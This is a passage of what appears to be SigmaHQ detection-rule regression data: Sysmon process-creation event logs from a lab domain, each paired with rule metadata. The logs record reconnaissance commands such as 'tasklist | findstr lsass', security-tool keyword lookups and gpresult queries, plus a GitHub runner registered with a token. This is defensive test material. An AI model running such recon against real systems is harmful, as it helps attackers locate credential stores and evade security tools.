\"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"tasklist | findstr powershell\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml",
    "content": "id: 5bb16f46-e370-4a40-a47a-d047e4482fc1\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ccb5742c-c248-4982-8c5c-5571b9275ad3\n      title: Recon Command Output Piped To Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:52:18.663980Z\"\n        }\n      },\n      \"EventRecordID\": 9145421,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:52:18.657\",\n      \"ProcessGuid\": \"5AA13A44-D612-68FC-1931-000000004002\",\n      \"ProcessId\": 5144,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.20348.3932 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"cmd  /c \\\"tasklist | findstr virus\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:52:18.675229Z\"\n        }\n      },\n      \"EventRecordID\": 9145437,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:52:18.674\",\n      \"ProcessGuid\": \"5AA13A44-D612-68FC-1A31-000000004002\",\n      \"ProcessId\": 6320,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Lists the current running tasks\",\n      \"Product\": \"Microsoft® Windows® 
Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"tasklist.exe\",\n      \"CommandLine\": \"tasklist\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE\",\n      \"ParentProcessGuid\": \"5AA13A44-D612-68FC-1931-000000004002\",\n      \"ParentProcessId\": 5144,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  /c \\\"tasklist | findstr virus\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:52:18.677359Z\"\n        }\n      },\n      \"EventRecordID\": 9145443,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": 
\"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:52:18.676\",\n      \"ProcessGuid\": \"5AA13A44-D612-68FC-1B31-000000004002\",\n      \"ProcessId\": 9052,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\findstr.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Find String (QGREP) Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"FINDSTR.EXE\",\n      \"CommandLine\": \"findstr  virus\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F\",\n      \"ParentProcessGuid\": \"5AA13A44-D612-68FC-1931-000000004002\",\n      \"ParentProcessId\": 5144,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  /c \\\"tasklist | findstr virus\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml",
    "content": "id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 4fe074b4-b833-4081-8f24-7dcfeca72b42\n      title: Security Tools Keyword Lookup Via Findstr.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:47:36.346438Z\"\n        }\n      },\n      \"EventRecordID\": 12260122,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:47:36.344\",\n      \"ProcessGuid\": \"5AA13A44-0D38-68FD-B736-000000004002\",\n      \"ProcessId\": 7732,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\finger.exe\",\n      \"FileVersion\": \"10.0.20348.3451 (WinBuild.160101.0800)\",\n      \"Description\": \"TCPIP Finger Command\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"finger.exe\",\n      \"CommandLine\": \"finger\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=9DFF43AAF3833E42520A4E426F9132ECFC8A1138,MD5=F05FE1D85C1E9B37E27A78DE2A099977,SHA256=9C08862150B290F3834D02F9C2924C3E163B403AC4B00853BCB78B40E00DE6B5,IMPHASH=4EC5391C083809964BB61804E493A505\",\n      \"ParentProcessGuid\": \"5AA13A44-0BDF-68FD-7936-000000004002\",\n      \"ParentProcessId\": 5232,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  / c \\\"tasklist | findstr lsass\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/info.yml",
    "content": "id: 312cf7da-b126-4d53-afc7-01c96aa9710e\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: af491bca-e752-4b44-9c86-df5680533dbc\n      title: Finger.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-02T13:40:15.065147Z\"\n        }\n      },\n      \"EventRecordID\": 129581,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3712,\n          \"ThreadID\": 5804\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"SUPPORTHUB\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-02 13:40:15.062\",\n      \"ProcessGuid\": \"39845534-EC3F-692E-AC01-000000007A00\",\n      \"ProcessId\": 2252,\n      \"Image\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Listener.exe\",\n      \"FileVersion\": \"2.329.0.0\",\n      \"Description\": \"Runner.Listener\",\n      \"Product\": \"Runner.Listener\",\n      \"Company\": \"Runner.Listener\",\n      \"OriginalFileName\": \"Runner.Listener.dll\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Listener.exe\\\"  configure --url https://github.com/Koifman/shaihulud --token ACJKO5TZBN2V54V7WQEQMMLJF34ZQ\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\\",\n      \"User\": \"SUPPORTHUB\\\\Lab\",\n      \"LogonGuid\": \"39845534-EA70-692E-18E8-080000000000\",\n      \"LogonId\": \"0x8e818\",\n  
    \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=F2D98E1A81C92345E9FB4C3A8BA80DA9,SHA256=0C90A42A6BE0078726279708539FF3275A40031BCCC6D31FCF77D0A03B6F6BBB,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E\",\n      \"ParentProcessGuid\": \"39845534-EC3E-692E-AA01-000000007A00\",\n      \"ParentProcessId\": 9300,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\config.cmd\\\" --url https://github.com/Koifman/shaihulud --token ACJKO5TZBN2V54V7WQEQMMLJF34ZQ\\\"\",\n      \"ParentUser\": \"SUPPORTHUB\\\\Lab\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-02T13:40:43.642304Z\"\n        }\n      },\n      \"EventRecordID\": 129609,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3712,\n          \"ThreadID\": 5804\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"SUPPORTHUB\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-02 13:40:43.639\",\n      \"ProcessGuid\": \"39845534-EC5B-692E-B601-000000007A00\",\n      \"ProcessId\": 6588,\n      \"Image\": 
\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Worker.exe\",\n      \"FileVersion\": \"2.329.0.0\",\n      \"Description\": \"Runner.Worker\",\n      \"Product\": \"Runner.Worker\",\n      \"Company\": \"Runner.Worker\",\n      \"OriginalFileName\": \"Runner.Worker.dll\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Worker.exe\\\" spawnclient 2076 2088\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\\",\n      \"User\": \"SUPPORTHUB\\\\Lab\",\n      \"LogonGuid\": \"39845534-EA70-692E-18E8-080000000000\",\n      \"LogonId\": \"0x8e818\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=B8B5BE3A38732DE389D648044B798146,SHA256=08A676AE543078E5C6163B94E17F9C38D3193A1D59E8BA94ADE43FA0BCA8312C,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E\",\n      \"ParentProcessGuid\": \"39845534-EC43-692E-AF01-000000007A00\",\n      \"ParentProcessId\": 7392,\n      \"ParentImage\": \"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\bin\\\\Runner.Listener.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\Lab\\\\Downloads\\\\actions-runner\\\\\\\\bin\\\\Runner.Listener.exe\\\"  run\",\n      \"ParentUser\": \"SUPPORTHUB\\\\Lab\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/info.yml",
    "content": "id: 94e5ba8c-3bdf-4e12-9300-f7684530d301\ndescription: Includes two process events that will match against the linked SIGMA rule for both conditions\ndate: 2025-12-02\nauthor: Daniel Koifman (KoifSec)\nrule_metadata:\n    - id: 5bac7a56-da88-4c27-922e-c81e113b20cb\n      title: Github Self-Hosted Runner Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:09:41.570583Z\"\n        }\n      },\n      \"EventRecordID\": 33638020,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:09:41.563\",\n      \"ProcessGuid\": \"5AA13A44-B845-68FE-3702-000000004102\",\n      \"ProcessId\": 9004,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"Query Group Policy RSOP Data\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"gprslt.exe\",\n      \"CommandLine\": \"gpresult  /z\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\DTrace\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=84DBEACB152615177EB5EE2AC4735B75186BC28F,MD5=80B679C92D709FF93DF2400966A5C183,SHA256=09F58BF0E2D334AAA7410AB613E71F4D1FD346ABEF010423020BD6C3A6C20195,IMPHASH=C853AD8534AC03E7AD69F32A5B0B1625\",\n      \"ParentProcessGuid\": \"5AA13A44-B6AD-68FE-FC01-000000004102\",\n      \"ParentProcessId\": 10508,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/info.yml",
    "content": "id: f0e9da0c-c305-4bcb-89e5-79621d0ba6d2\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e56d3073-83ff-4021-90fe-c658e0709e72\n      title: Gpresult Display Group Policy Information\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-27T00:11:22.294854Z\"\n        }\n      },\n      \"EventRecordID\": 33639600,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3380,\n          \"ThreadID\": 4420\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-27 00:11:22.292\",\n      \"ProcessGuid\": \"5AA13A44-B8AA-68FE-3F02-000000004102\",\n      \"ProcessId\": 7784,\n      \"Image\": \"C:\\\\Windows\\\\hh.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Microsoft® HTML Help Executable\",\n      \"Product\": \"HTML Help\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"HH.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Windows\\\\hh.exe\\\" C:\\\\Windows\\\\IME\\\\IMETC\\\\HELP\\\\IMTCTC14.CHM\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\IME\\\\IMETC\\\\HELP\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-B54F-68FE-E547-0C0000000000\",\n      \"LogonId\": \"0xc47e5\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C\",\n      \"ParentProcessGuid\": \"5AA13A44-B55F-68FE-1A01-000000004102\",\n      \"ParentProcessId\": 8100,\n      \"ParentImage\": \"C:\\\\Program Files\\\\Everything\\\\Everything.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Program Files\\\\Everything\\\\Everything.exe\\\" -startup\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml",
    "content": "id: 627bc1e3-7961-4d77-96df-915627f8c3fc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84\n      title: HH.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T08:12:45.123135Z\"\n        }\n      },\n      \"EventRecordID\": 733841,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": 